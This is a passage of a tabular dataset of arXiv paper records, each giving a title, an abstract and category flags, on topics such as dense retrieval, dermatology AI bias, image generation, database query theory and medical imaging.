Distributions | Measures of uncertainty and divergence are introduced for interval-valued probability distributions and are shown to have desirable mathematical properties. A maximum uncertainty inference procedure for marginal interval distributions is presented. A technique for reconstruction of interval distributions from projections is developed based on this inference procedure | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | 23,555 |
2306.10348 | Typo-Robust Representation Learning for Dense Retrieval | Dense retrieval is a basic building block of information retrieval applications. One of the main challenges of dense retrieval in real-world settings is the handling of queries containing misspelled words. A popular approach for handling misspelled queries is minimizing the representations discrepancy between misspelled queries and their pristine ones. Unlike the existing approaches, which only focus on the alignment between misspelled and pristine queries, our method also improves the contrast between each misspelled query and its surrounding queries. To assess the effectiveness of our proposed method, we compare it against the existing competitors using two benchmark datasets and two base encoders. Our method outperforms the competitors in all cases with misspelled queries. Our code and models are available at https://github. com/panuthept/DST-DenseRetrieval. | false | false | false | false | false | true | false | false | true | false | false | false | false | false | false | false | false | false | 374,195 |
2203.08807 | Disparities in Dermatology AI Performance on a Diverse, Curated Clinical
Image Set | Access to dermatological care is a major issue, with an estimated 3 billion people lacking access to care globally. Artificial intelligence (AI) may aid in triaging skin diseases. However, most AI models have not been rigorously assessed on images of diverse skin tones or uncommon diseases. To ascertain potential biases in algorithm performance in this context, we curated the Diverse Dermatology Images (DDI) dataset-the first publicly available, expertly curated, and pathologically confirmed image dataset with diverse skin tones. Using this dataset of 656 images, we show that state-of-the-art dermatology AI models perform substantially worse on DDI, with receiver operator curve area under the curve (ROC-AUC) dropping by 27-36 percent compared to the models' original test results. All the models performed worse on dark skin tones and uncommon diseases, which are represented in the DDI dataset. Additionally, we find that dermatologists, who typically provide visual labels for AI training and test datasets, also perform worse on images of dark skin tones and uncommon diseases compared to ground truth biopsy annotations. Finally, fine-tuning AI models on the well-characterized and diverse DDI images closed the performance gap between light and dark skin tones. Moreover, algorithms fine-tuned on diverse skin tones outperformed dermatologists on identifying malignancy on images of dark skin tones. Our findings identify important weaknesses and biases in dermatology AI that need to be addressed to ensure reliable application to diverse patients and diseases. | false | false | false | false | true | false | true | false | false | false | false | true | false | false | false | false | false | false | 285,916 |
2501.01097 | EliGen: Entity-Level Controlled Image Generation with Regional Attention | Recent advancements in diffusion models have significantly advanced text-to-image generation, yet global text prompts alone remain insufficient for achieving fine-grained control over individual entities within an image. To address this limitation, we present EliGen, a novel framework for Entity-level controlled image Generation. Firstly, we put forward regional attention, a mechanism for diffusion transformers that requires no additional parameters, seamlessly integrating entity prompts and arbitrary-shaped spatial masks. By contributing a high-quality dataset with fine-grained spatial and semantic entity-level annotations, we train EliGen to achieve robust and accurate entity-level manipulation, surpassing existing methods in both spatial precision and image quality. Additionally, we propose an inpainting fusion pipeline, extending its capabilities to multi-entity image inpainting tasks. We further demonstrate its flexibility by integrating it with other open-source models such as IP-Adapter, In-Context LoRA and MLLM, unlocking new creative possibilities. The source code, model, and dataset are published at https://github.com/modelscope/DiffSynth-Studio.git. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 521,921 |
1712.06751 | HotFlip: White-Box Adversarial Examples for Text Classification | We propose an efficient method to generate white-box adversarial examples to trick a character-level neural classifier. We find that only a few manipulations are needed to greatly decrease the accuracy. Our method relies on an atomic flip operation, which swaps one token for another, based on the gradients of the one-hot input vectors. Due to efficiency of our method, we can perform adversarial training which makes the model more robust to attacks at test time. With the use of a few semantics-preserving constraints, we demonstrate that HotFlip can be adapted to attack a word-level classifier as well. | false | false | false | false | false | false | true | false | true | false | false | false | false | false | false | false | false | false | 86,928 |
1602.01366 | Semantic Acyclicity Under Constraints | A conjunctive query (CQ) is semantically acyclic if it is equivalent to an acyclic one. Semantic acyclicity has been studied in the constraint-free case, and deciding whether a query enjoys this property is NP-complete. However, in case the database is subject to constraints such as tuple-generating dependencies (tgds) that can express, e.g., inclusion dependencies, or equality-generating dependencies (egds) that capture, e.g., functional dependencies, a CQ may turn out to be semantically acyclic under the constraints while not semantically acyclic in general. This opens avenues to new query optimization techniques. In this paper we initiate and develop the theory of semantic acyclicity under constraints. More precisely, we study the following natural problem: Given a CQ and a set of constraints, is the query semantically acyclic under the constraints, or, in other words, is the query equivalent to an acyclic one over all those databases that satisfy the set of constraints? We show that, contrary to what one might expect, decidability of CQ containment is a necessary but not sufficient condition for the decidability of semantic acyclicity. In particular, we show that semantic acyclicity is undecidable in the presence of full tgds (i.e., Datalog rules). In view of this fact, we focus on the main classes of tgds for which CQ containment is decidable, and do not capture the class of full tgds, namely guarded, non-recursive and sticky tgds. For these classes we show that semantic acyclicity is decidable, and its complexity coincides with the complexity of CQ containment. In the case of egds, we show that for keys over unary and binary predicates semantic acyclicity is decidable (NP-complete). We finally consider the problem of evaluating a semantically acyclic query over a database that satisfies a set of constraints; for guarded tgds and functional dependencies this problem is tractable. | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | true | true | 51,690 |
2412.03801 | Agent AI with LangGraph: A Modular Framework for Enhancing Machine
Translation Using Large Language Models | This paper explores the transformative role of Agent AI and LangGraph in advancing the automation and effectiveness of machine translation (MT). Agents are modular components designed to perform specific tasks, such as translating between particular languages, with specializations like TranslateEnAgent, TranslateFrenchAgent, and TranslateJpAgent for English, French, and Japanese translations, respectively. These agents leverage the powerful semantic capabilities of large language models (LLMs), such as GPT-4o, to ensure accurate, contextually relevant translations while maintaining modularity, scalability, and context retention. LangGraph, a graph-based framework built on LangChain, simplifies the creation and management of these agents and their workflows. It supports dynamic state management, enabling agents to maintain dialogue context and automates complex workflows by linking agents and facilitating their collaboration. With flexibility, open-source community support, and seamless integration with LLMs, LangGraph empowers agents to deliver high-quality translations. Together, Agent AI and LangGraph create a cohesive system where LangGraph orchestrates agent interactions, ensuring that user inputs are analyzed, routed, and processed efficiently. Experimental results demonstrate the potential of this system to enhance multilingual translation accuracy and scalability. By highlighting modular design and automated workflows, this paper sets the stage for further innovations in intelligent machine translation services. | false | false | false | false | true | false | false | false | true | false | false | false | false | false | false | false | false | false | 514,111 |
2312.07580 | COVID-19 Detection Using Slices Processing Techniques and a Modified
Xception Classifier from Computed Tomography Images | This paper extends our previous method for COVID-19 diagnosis, proposing an enhanced solution for detecting COVID-19 from computed tomography (CT) images. To decrease model misclassifications, two key steps of image processing were employed. Firstly, the uppermost and lowermost slices were removed, preserving sixty percent of each patient's slices. Secondly, all slices underwent manual cropping to emphasize the lung areas. Subsequently, resized CT scans (224 by 224) were input into an Xception transfer learning model. Leveraging Xception's architecture and pre-trained weights, the modified model achieved binary classification. Promising results on the COV19-CT database showcased higher validation accuracy and macro F1 score at both the slice and patient levels compared to our previous solution and alternatives on the same dataset. | false | false | false | false | false | false | true | false | false | false | false | true | false | false | false | false | false | false | 414,983 |
2311.09553 | Program-Aided Reasoners (better) Know What They Know | Prior work shows that program-aided reasoning, in which large language models (LLMs) are combined with programs written in programming languages such as Python, can significantly improve accuracy on various reasoning tasks. However, while accuracy is essential, it is also important for such reasoners to "know what they know", which can be quantified through the calibration of the model. In this paper, we compare the calibration of Program Aided Language Models (PAL) and text-based Chain-of-thought (COT) prompting techniques over 5 datasets and 2 model types: LLaMA models and OpenAI models. Our results indicate that PAL leads to improved calibration in 75% of the instances. Our analysis uncovers that prompting styles that produce lesser diversity in generations also have more calibrated results, and thus we also experiment with inducing lower generation diversity using temperature scaling and find that for certain temperatures, PAL is not only more accurate but is also more calibrated than COT. Overall, we demonstrate that, in the majority of cases, program-aided reasoners better know what they know than text-based counterparts. | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | 408,177 |
2203.13248 | Pastiche Master: Exemplar-Based High-Resolution Portrait Style Transfer | Recent studies on StyleGAN show high performance on artistic portrait generation by transfer learning with limited data. In this paper, we explore more challenging exemplar-based high-resolution portrait style transfer by introducing a novel DualStyleGAN with flexible control of dual styles of the original face domain and the extended artistic portrait domain. Different from StyleGAN, DualStyleGAN provides a natural way of style transfer by characterizing the content and style of a portrait with an intrinsic style path and a new extrinsic style path, respectively. The delicately designed extrinsic style path enables our model to modulate both the color and complex structural styles hierarchically to precisely pastiche the style example. Furthermore, a novel progressive fine-tuning scheme is introduced to smoothly transform the generative space of the model to the target domain, even with the above modifications on the network architecture. Experiments demonstrate the superiority of DualStyleGAN over state-of-the-art methods in high-quality portrait style transfer and flexible style control. | false | false | false | false | false | false | true | false | false | false | false | true | false | false | false | false | false | false | 287,555 |
2502.04770 | Efficient Evaluation of Quantization-Effects in Neural Codecs | Neural codecs, comprising an encoder, quantizer, and decoder, enable signal transmission at exceptionally low bitrates. Training these systems requires techniques like the straight-through estimator, soft-to-hard annealing, or statistical quantizer emulation to allow a non-zero gradient across the quantizer. Evaluating the effect of quantization in neural codecs, like the influence of gradient passing techniques on the whole system, is often costly and time-consuming due to training demands and the lack of affordable and reliable metrics. This paper proposes an efficient evaluation framework for neural codecs using simulated data with a defined number of bits and low-complexity neural encoders/decoders to emulate the non-linear behavior in larger networks. Our system is highly efficient in terms of training time and computational and hardware requirements, allowing us to uncover distinct behaviors in neural codecs. We propose a modification to stabilize training with the straight-through estimator based on our findings. We validate our findings against an internal neural audio codec and against the state-of-the-art descript-audio-codec. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 531,313 |
2409.07712 | Virtual Node Generation for Node Classification in Sparsely-Labeled
Graphs | In the broader machine learning literature, data-generation methods demonstrate promising results by generating additional informative training examples via augmenting sparse labels. Such methods are less studied in graphs due to the intricate dependencies among nodes in complex topology structures. This paper presents a novel node generation method that infuses a small set of high-quality synthesized nodes into the graph as additional labeled nodes to optimally expand the propagation of labeled information. By simply infusing additional nodes, the framework is orthogonal to the graph learning and downstream classification techniques, and thus is compatible with most popular graph pre-training (self-supervised learning), semi-supervised learning, and meta-learning methods. The contribution lies in designing the generated node set by solving a novel optimization problem. The optimization places the generated nodes in a manner that: (1) minimizes the classification loss to guarantee training accuracy and (2) maximizes label propagation to low-confidence nodes in the downstream task to ensure high-quality propagation. Theoretically, we show that the above dual optimization maximizes the global confidence of node classification. Our Experiments demonstrate statistically significant performance improvements over 14 baselines on 10 publicly available datasets. | false | false | false | true | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 487,625 |
2209.07587 | Theoretical Insight into Batch Normalization: Data Dependant Auto-Tuning
of Regularization Rate | Batch normalization is widely used in deep learning to normalize intermediate activations. Deep networks suffer from notoriously increased training complexity, mandating careful initialization of weights, requiring lower learning rates, etc. These issues have been addressed by Batch Normalization (\textbf{BN}), by normalizing the inputs of activations to zero mean and unit standard deviation. Making this batch normalization part of the training process dramatically accelerates the training process of very deep networks. A new field of research has been going on to examine the exact theoretical explanation behind the success of \textbf{BN}. Most of these theoretical insights attempt to explain the benefits of \textbf{BN} by placing them on its influence on optimization, weight scale invariance, and regularization. Despite \textbf{BN} undeniable success in accelerating generalization, the gap of analytically relating the effect of \textbf{BN} to the regularization parameter is still missing. This paper aims to bring out the data-dependent auto-tuning of the regularization parameter by \textbf{BN} with analytical proofs. We have posed \textbf{BN} as a constrained optimization imposed on non-\textbf{BN} weights through which we demonstrate its data statistics dependant auto-tuning of regularization parameter. We have also given analytical proof for its behavior under a noisy input scenario, which reveals the signal vs. noise tuning of the regularization parameter. We have also substantiated our claim with empirical results from the MNIST dataset experiments. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 317,803 |
0710.3502 | Using Synchronic and Diachronic Relations for Summarizing Multiple
Documents Describing Evolving Events | In this paper we present a fresh look at the problem of summarizing evolving events from multiple sources. After a discussion concerning the nature of evolving events we introduce a distinction between linearly and non-linearly evolving events. We present then a general methodology for the automatic creation of summaries from evolving events. At its heart lie the notions of Synchronic and Diachronic cross-document Relations (SDRs), whose aim is the identification of similarities and differences between sources, from a synchronical and diachronical perspective. SDRs do not connect documents or textual elements found therein, but structures one might call messages. Applying this methodology will yield a set of messages and relations, SDRs, connecting them, that is a graph which we call grid. We will show how such a grid can be considered as the starting point of a Natural Language Generation System. The methodology is evaluated in two case-studies, one for linearly evolving events (descriptions of football matches) and another one for non-linearly evolving events (terrorist incidents involving hostages). In both cases we evaluate the results produced by our computational systems. | false | false | false | false | false | true | false | false | true | false | false | false | false | false | false | false | false | false | 799 |
2110.11679 | Depth-only Object Tracking | Depth (D) indicates occlusion and is less sensitive to illumination changes, which make depth attractive modality for Visual Object Tracking (VOT). Depth is used in RGBD object tracking where the best trackers are deep RGB trackers with additional heuristic using depth maps. There are two potential reasons for the heuristics: 1) the lack of large RGBD tracking datasets to train deep RGBD trackers and 2) the long-term evaluation protocol of VOT RGBD that benefits from heuristics such as depth-based occlusion detection. In this work, we study how far D-only tracking can go if trained with large amounts of depth data. To compensate the lack of depth data, we generate depth maps for tracking. We train a "Depth-DiMP" from the scratch with the generated data and fine-tune it with the available small RGBD tracking datasets. The depth-only DiMP achieves good accuracy in depth-only tracking and combined with the original RGB DiMP the end-to-end trained RGBD-DiMP outperforms the recent VOT 2020 RGBD winners. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 262,571 |
2407.17195 | Surrogate-guided optimization in quantum networks | We propose an optimization algorithm to improve the design and performance of quantum communication networks. When physical architectures become too complex for analytical methods, numerical simulation becomes essential to study quantum network behavior. Although highly informative, these simulations involve complex numerical functions without known analytical forms, making traditional optimization techniques that assume continuity, differentiability, or convexity inapplicable. Additionally, quantum network simulations are computationally demanding, rendering global approaches like Simulated Annealing or genetic algorithms, which require extensive function evaluations, impractical. We introduce a more efficient optimization workflow using machine learning models, which serve as surrogates for a given objective function. We demonstrate the effectiveness of our approach by applying it to three well-known optimization problems in quantum networking: quantum memory allocation for multiple network nodes, tuning an experimental parameter in all physical links of a quantum entanglement switch, and finding efficient protocol settings within a large asymmetric quantum network. The solutions found by our algorithm consistently outperform those obtained with our baseline approaches -- Simulated Annealing and Bayesian optimization -- in the allotted time limit by up to 18\% and 20\%, respectively. Our framework thus allows for more comprehensive quantum network studies, integrating surrogate-assisted optimization with existing quantum network simulators. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 475,881 |
2305.16971 | Theoretical and Practical Perspectives on what Influence Functions Do | Influence functions (IF) have been seen as a technique for explaining model predictions through the lens of the training data. Their utility is assumed to be in identifying training examples "responsible" for a prediction so that, for example, correcting a prediction is possible by intervening on those examples (removing or editing them) and retraining the model. However, recent empirical studies have shown that the existing methods of estimating IF predict the leave-one-out-and-retrain effect poorly. In order to understand the mismatch between the theoretical promise and the practical results, we analyse five assumptions made by IF methods which are problematic for modern-scale deep neural networks and which concern convexity, numeric stability, training trajectory and parameter divergence. This allows us to clarify what can be expected theoretically from IF. We show that while most assumptions can be addressed successfully, the parameter divergence poses a clear limitation on the predictive power of IF: influence fades over training time even with deterministic training. We illustrate this theoretical result with BERT and ResNet models. Another conclusion from the theoretical analysis is that IF are still useful for model debugging and correcting even though some of the assumptions made in prior work do not hold: using natural language processing and computer vision tasks, we verify that mis-predictions can be successfully corrected by taking only a few fine-tuning steps on influential examples. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 368,350 |
2204.00448 | Zero-Shot Cross-lingual Aphasia Detection using Automatic Speech
Recognition | Aphasia is a common speech and language disorder, typically caused by a brain injury or a stroke, that affects millions of people worldwide. Detecting and assessing Aphasia in patients is a difficult, time-consuming process, and numerous attempts to automate it have been made, the most successful using machine learning models trained on aphasic speech data. Like in many medical applications, aphasic speech data is scarce and the problem is exacerbated in so-called "low resource" languages, which are, for this task, most languages excluding English. We attempt to leverage available data in English and achieve zero-shot aphasia detection in low-resource languages such as Greek and French, by using language-agnostic linguistic features. Current cross-lingual aphasia detection approaches rely on manually extracted transcripts. We propose an end-to-end pipeline using pre-trained Automatic Speech Recognition (ASR) models that share cross-lingual speech representations and are fine-tuned for our desired low-resource languages. To further boost our ASR model's performance, we also combine it with a language model. We show that our ASR-based end-to-end pipeline offers comparable results to previous setups using human-annotated transcripts. | false | false | false | false | true | false | true | false | true | false | false | false | false | false | false | false | false | false | 289,258 |
cs/0204047 | Sampling Strategies for Mining in Data-Scarce Domains | Data mining has traditionally focused on the task of drawing inferences from large datasets. However, many scientific and engineering domains, such as fluid dynamics and aircraft design, are characterized by scarce data, due to the expense and complexity of associated experiments and simulations. In such data-scarce domains, it is advantageous to focus the data collection effort on only those regions deemed most important to support a particular data mining objective. This paper describes a mechanism that interleaves bottom-up data mining, to uncover multi-level structures in spatial data, with top-down sampling, to clarify difficult decisions in the mining process. The mechanism exploits relevant physical properties, such as continuity, correspondence, and locality, in a unified framework. This leads to effective mining and sampling decisions that are explainable in terms of domain knowledge and data characteristics. This approach is demonstrated in two diverse applications -- mining pockets in spatial data, and qualitative determination of Jordan forms of matrices. | false | true | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | 537,558 |
2501.10835 | Anatomy of a Historic Blackout: Decoding Spatiotemporal Dynamics of
Power Outages and Disparities During Hurricane Beryl | This study investigates the spatial patterns and temporal variations in outage duration, intensity, and restoration/recovery following the 2024 Hurricane Beryl in Houston, Texas. This historic blackout caused widespread power disruptions across the Houston metropolitan area, leaving more than 2 million customers without power over several days, resulting in more than 143 million total customer-out hours.The findings reveal that areas with higher population density and proximity to the hurricane's path experienced more severe initial impacts. Regions with higher median income showed faster recovery, while lower-income areas exhibited prolonged restoration periods, even with favorable infrastructural conditions, suggesting disparities in restoration speed. The study also highlights how urban development features, such as road density and land elevation, explain spatial disparities in power outage impacts and recovery. This research advances the understanding of power outage dynamics in large metropolitan regions through four key contributions: (1) empirical characterization of outages from a historic hurricane, highlighting infrastructure vulnerabilities in a high-density urban context; (2) comprehensive analysis using multiple metrics to capture spatiotemporal dynamics of outages and restoration; (3) leveraging of high-resolution outage data at fine geographic scales and frequent intervals to quantify and reveal previously masked spatial disparities; and (4) systematic examination of socioeconomic, urban development, and environmental factors in shaping disparities in outage impacts and recovery timelines. These findings provide infrastructure managers, operators, utilities, and decision-makers with crucial empirical insights to quantify power outage impacts, justify resilience investments, and address vulnerability and equity issues in the power infrastructure during hazard events. | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | 525,679 |
2011.12262 | Model Elicitation through Direct Questioning | The future will be replete with scenarios where humans are robots will be working together in complex environments. Teammates interact, and the robot's interaction has to be about getting useful information about the human's (teammate's) model. There are many challenges before a robot can interact, such as incorporating the structural differences in the human's model, ensuring simpler responses, etc. In this paper, we investigate how a robot can interact to localize the human model from a set of models. We show how to generate questions to refine the robot's understanding of the teammate's model. We evaluate the method in various planning domains. The evaluation shows that these questions can be generated offline, and can help refine the model through simple answers. | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | 208,106 |
2310.11960 | Fast Multipole Attention: A Divide-and-Conquer Attention Mechanism for
Long Sequences | Transformer-based models have achieved state-of-the-art performance in many areas. However, the quadratic complexity of self-attention with respect to the input length hinders the applicability of Transformer-based models to long sequences. To address this, we present Fast Multipole Attention, a new attention mechanism that uses a divide-and-conquer strategy to reduce the time and memory complexity of attention for sequences of length $n$ from $\mathcal{O}(n^2)$ to $\mathcal{O}(n \log n)$ or $O(n)$, while retaining a global receptive field. The hierarchical approach groups queries, keys, and values into $\mathcal{O}( \log n)$ levels of resolution, where groups at greater distances are increasingly larger in size and the weights to compute group quantities are learned. As such, the interaction between tokens far from each other is considered in lower resolution in an efficient hierarchical manner. The overall complexity of Fast Multipole Attention is $\mathcal{O}(n)$ or $\mathcal{O}(n \log n)$, depending on whether the queries are down-sampled or not. This multi-level divide-and-conquer strategy is inspired by fast summation methods from $n$-body physics and the Fast Multipole Method. We perform evaluation on autoregressive and bidirectional language modeling tasks and compare our Fast Multipole Attention model with other efficient attention variants on medium-size datasets. We find empirically that the Fast Multipole Transformer performs much better than other efficient transformers in terms of memory size and accuracy. The Fast Multipole Attention mechanism has the potential to empower large language models with much greater sequence lengths, taking the full context into account in an efficient, naturally hierarchical manner during training and when generating long sequences. | false | false | false | false | false | false | true | false | true | false | false | false | false | false | false | false | false | false | 400,850 |
2401.11940 | Low-Tubal-Rank Tensor Recovery via Factorized Gradient Descent | This paper considers the problem of recovering a tensor with an underlying low-tubal-rank structure from a small number of corrupted linear measurements. Traditional approaches tackling such a problem require the computation of tensor Singular Value Decomposition (t-SVD), that is a computationally intensive process, rendering them impractical for dealing with large-scale tensors. Aim to address this challenge, we propose an efficient and effective low-tubal-rank tensor recovery method based on a factorization procedure akin to the Burer-Monteiro (BM) method. Precisely, our fundamental approach involves decomposing a large tensor into two smaller factor tensors, followed by solving the problem through factorized gradient descent (FGD). This strategy eliminates the need for t-SVD computation, thereby reducing computational costs and storage requirements. We provide rigorous theoretical analysis to ensure the convergence of FGD under both noise-free and noisy situations. Additionally, it is worth noting that our method does not require the precise estimation of the tensor tubal-rank. Even in cases where the tubal-rank is slightly overestimated, our approach continues to demonstrate robust performance. A series of experiments have been carried out to demonstrate that, as compared to other popular ones, our approach exhibits superior performance in multiple scenarios, in terms of the faster computational speed and the smaller convergence error. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 423,207 |
2303.14639 | CRRS: Concentric Rectangles Regression Strategy for Multi-point
Representation on Fisheye Images | Modern object detectors take advantage of rectangular bounding boxes as a conventional way to represent objects. When it comes to fisheye images, rectangular boxes involve more background noise rather than semantic information. Although multi-point representation has been proposed, both the regression accuracy and convergence still perform inferior to the widely used rectangular boxes. In order to further exploit the advantages of multi-point representation for distorted images, Concentric Rectangles Regression Strategy(CRRS) is proposed in this work. We adopt smoother mean loss to allocate weights and discuss the effect of hyper-parameter to prediction results. Moreover, an accurate pixel-level method is designed to obtain irregular IoU for estimating detector performance. Compared with the previous work for muti-point representation, the experiments show that CRRS can improve the training performance both in accurate and stability. We also prove that multi-task weighting strategy facilitates regression process in this design. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 354,182 |
1402.5043 | A logical model of Theory of Mind for virtual agents in the context of
job interview simulation | Job interview simulation with a virtual agents aims at improving people's social skills and supporting professional inclusion. In such simulators, the virtual agent must be capable of representing and reasoning about the user's mental state based on social cues that inform the system about his/her affects and social attitude. In this paper, we propose a formal model of Theory of Mind (ToM) for virtual agent in the context of human-agent interaction that focuses on the affective dimension. It relies on a hybrid ToM that combines the two major paradigms of the domain. Our framework is based on modal logic and inference rules about the mental states, emotions and social relations of both actors. Finally, we present preliminary results regarding the impact of such a model on natural interaction in the context of job interviews simulation. | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | 31,017 |
2104.05541 | Optimizing the Whole-life Cost in End-to-end CNN Acceleration | The acceleration of CNNs has gained increasing atten-tion since their success in computer vision. With the heterogeneous functional layers that cannot be pro-cessed by the accelerators proposed for convolution layers only, modern end-to-end CNN acceleration so-lutions either transform the diverse computation into matrix/vector arithmetic, which loses data reuse op-portunities in convolution, or introduce dedicated functional unit to each kind of layer, which results in underutilization and high update expense. To enhance the whole-life cost efficiency, we need an acceleration solution that is efficient in processing CNN layers and has the generality to apply to all kinds of existing and emerging layers. To this end, we pro-pose GCONV Chain, a method to convert the entire CNN computation into a chain of standard general convolutions (GCONV) that can be efficiently pro-cessed by the existing CNN accelerators. This paper comprehensively analyzes the GCONV Chain model and proposes a full-stack implementation to support GCONV Chain. On one hand, the results on seven var-ious CNNs demonstrate that GCONV Chain improves the performance and energy efficiency of existing CNN accelerators by an average of 3.4x and 3.2x re-spectively. On the other hand, we show that GCONV Chain provides low whole-life costs for CNN accelera-tion, including both developer efforts and total cost of ownership for the users. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | true | 229,766 |
2412.07594 | RFL: Simplifying Chemical Structure Recognition with Ring-Free Language | The primary objective of Optical Chemical Structure Recognition is to identify chemical structure images into corresponding markup sequences. However, the complex two-dimensional structures of molecules, particularly those with rings and multiple branches, present significant challenges for current end-to-end methods to learn one-dimensional markup directly. To overcome this limitation, we propose a novel Ring-Free Language (RFL), which utilizes a divide-and-conquer strategy to describe chemical structures in a hierarchical form. RFL allows complex molecular structures to be decomposed into multiple parts, ensuring both uniqueness and conciseness while enhancing readability. This approach significantly reduces the learning difficulty for recognition models. Leveraging RFL, we propose a universal Molecular Skeleton Decoder (MSD), which comprises a skeleton generation module that progressively predicts the molecular skeleton and individual rings, along with a branch classification module for predicting branch information. Experimental results demonstrate that the proposed RFL and MSD can be applied to various mainstream methods, achieving superior performance compared to state-of-the-art approaches in both printed and handwritten scenarios. The code is available at https://github.com/JingMog/RFL-MSD. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 515,729 |
2410.03333 | Comparative Analysis and Ensemble Enhancement of Leading CNN
Architectures for Breast Cancer Classification | This study introduces a novel and accurate approach to breast cancer classification using histopathology images. It systematically compares leading Convolutional Neural Network (CNN) models across varying image datasets, identifies their optimal hyperparameters, and ranks them based on classification efficacy. To maximize classification accuracy for each model we explore, the effects of data augmentation, alternative fully-connected layers, model training hyperparameter settings, and, the advantages of retraining models versus using pre-trained weights. Our methodology includes several original concepts, including serializing generated datasets to ensure consistent data conditions across training runs and significantly reducing training duration. Combined with automated curation of results, this enabled the exploration of over 2,000 training permutations -- such a comprehensive comparison is as yet unprecedented. Our findings establish the settings required to achieve exceptional classification accuracy for standalone CNN models and rank them by model efficacy. Based on these results, we propose ensemble architectures that stack three high-performing standalone CNN models together with diverse classifiers, resulting in improved classification accuracy. The ability to systematically run so many model permutations to get the best outcomes gives rise to very high quality results, including 99.75% for BreakHis x40 and BreakHis x200 and 95.18% for the Bach datasets when split into train, validation and test datasets. The Bach Online blind challenge, yielded 89% using this approach. Whilst this study is based on breast cancer histopathology image datasets, the methodology is equally applicable to other medical image datasets. | false | false | false | false | true | false | false | false | false | false | false | true | false | false | false | false | false | false | 494,735 |
2003.05218 | Keyfilter-Aware Real-Time UAV Object Tracking | Correlation filter-based tracking has been widely applied in unmanned aerial vehicle (UAV) with high efficiency. However, it has two imperfections, i.e., boundary effect and filter corruption. Several methods enlarging the search area can mitigate boundary effect, yet introducing undesired background distraction. Existing frame-by-frame context learning strategies for repressing background distraction nevertheless lower the tracking speed. Inspired by keyframe-based simultaneous localization and mapping, keyfilter is proposed in visual tracking for the first time, in order to handle the above issues efficiently and effectively. Keyfilters generated by periodically selected keyframes learn the context intermittently and are used to restrain the learning of filters, so that 1) context awareness can be transmitted to all the filters via keyfilter restriction, and 2) filter corruption can be repressed. Compared to the state-of-the-art results, our tracker performs better on two challenging benchmarks, with enough speed for UAV real-time applications. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 167,807 |
2111.06762 | Diversity-Promoting Human Motion Interpolation via Conditional
Variational Auto-Encoder | In this paper, we present a deep generative model based method to generate diverse human motion interpolation results. We resort to the Conditional Variational Auto-Encoder (CVAE) to learn human motion conditioned on a pair of given start and end motions, by leveraging the Recurrent Neural Network (RNN) structure for both the encoder and the decoder. Additionally, we introduce a regularization loss to further promote sample diversity. Once trained, our method is able to generate multiple plausible coherent motions by repetitively sampling from the learned latent space. Experiments on the publicly available dataset demonstrate the effectiveness of our method, in terms of sample plausibility and diversity. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 266,167 |
2308.08482 | Benign Shortcut for Debiasing: Fair Visual Recognition via Intervention
with Shortcut Features | Machine learning models often learn to make predictions that rely on sensitive social attributes like gender and race, which poses significant fairness risks, especially in societal applications, such as hiring, banking, and criminal justice. Existing work tackles this issue by minimizing the employed information about social attributes in models for debiasing. However, the high correlation between target task and these social attributes makes learning on the target task incompatible with debiasing. Given that model bias arises due to the learning of bias features (\emph{i.e}., gender) that help target task optimization, we explore the following research question: \emph{Can we leverage shortcut features to replace the role of bias feature in target task optimization for debiasing?} To this end, we propose \emph{Shortcut Debiasing}, to first transfer the target task's learning of bias attributes from bias features to shortcut features, and then employ causal intervention to eliminate shortcut features during inference. The key idea of \emph{Shortcut Debiasing} is to design controllable shortcut features to on one hand replace bias features in contributing to the target task during the training stage, and on the other hand be easily removed by intervention during the inference stage. This guarantees the learning of the target task does not hinder the elimination of bias features. We apply \emph{Shortcut Debiasing} to several benchmark datasets, and achieve significant improvements over the state-of-the-art debiasing methods in both accuracy and fairness. | false | false | false | false | true | false | true | false | false | false | false | false | false | true | false | false | false | false | 385,921 |
2403.09813 | Towards Comprehensive Multimodal Perception: Introducing the
Touch-Language-Vision Dataset | Tactility provides crucial support and enhancement for the perception and interaction capabilities of both humans and robots. Nevertheless, the multimodal research related to touch primarily focuses on visual and tactile modalities, with limited exploration in the domain of language. Beyond vocabulary, sentence-level descriptions contain richer semantics. Based on this, we construct a touch-language-vision dataset named TLV (Touch-Language-Vision) by human-machine cascade collaboration, featuring sentence-level descriptions for multimode alignment. The new dataset is used to fine-tune our proposed lightweight training framework, STLV-Align (Synergistic Touch-Language-Vision Alignment), achieving effective semantic alignment with minimal parameter adjustments (1%). Project Page: https://xiaoen0.github.io/touch.page/. | false | false | false | false | false | false | false | true | false | false | false | true | false | false | false | false | false | false | 437,922 |
1604.05372 | Clustering Comparable Corpora of Russian and Ukrainian Academic Texts:
Word Embeddings and Semantic Fingerprints | We present our experience in applying distributional semantics (neural word embeddings) to the problem of representing and clustering documents in a bilingual comparable corpus. Our data is a collection of Russian and Ukrainian academic texts, for which topics are their academic fields. In order to build language-independent semantic representations of these documents, we train neural distributional models on monolingual corpora and learn the optimal linear transformation of vectors from one language to another. The resulting vectors are then used to produce `semantic fingerprints' of documents, serving as input to a clustering algorithm. The presented method is compared to several baselines including `orthographic translation' with Levenshtein edit distance and outperforms them by a large margin. We also show that language-independent `semantic fingerprints' are superior to multi-lingual clustering algorithms proposed in the previous work, at the same time requiring less linguistic resources. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 54,796 |
Subsets and Splits
No community queries yet
